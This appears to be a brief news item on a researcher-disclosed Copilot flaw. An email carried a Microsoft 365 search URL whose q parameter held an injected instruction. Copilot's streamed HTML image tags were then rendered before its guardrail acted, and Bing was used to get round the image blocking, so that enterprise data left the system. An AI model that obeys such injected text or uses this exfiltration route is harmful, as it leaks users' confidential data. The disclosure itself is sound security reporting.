Copilot flaw let attackers exfiltrate enterprise data via image requests

Researchers demonstrated a Parameter-to-Prompt Injection by sending a targeted email containing a URL with this syntax: https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=. The q field carried an instruction and Copilot complied. "The search functionality is exactly what attackers need, because even with limited capabilities, a user with access to critical information is enough," the researchers wrote.

The problem arose because Copilot streamed raw HTML during its "thinking" phase, which the browser temporarily rendered. The sequence: Copilot starts streaming its response, which includes an tag; the browser sees the , renders it, and fires off an HTTP request to the src URL; Copilot finishes generating; the guardrail wraps everything in —Too late!

The request already left. Because Copilot blocks most image requests, the exploit used Microsoft's Bing as a trampoline.

copilot, prompt injection, parameter-to-prompt, data exfiltration, image requests, html streaming, browser rendering, bing, microsoft, enterprise data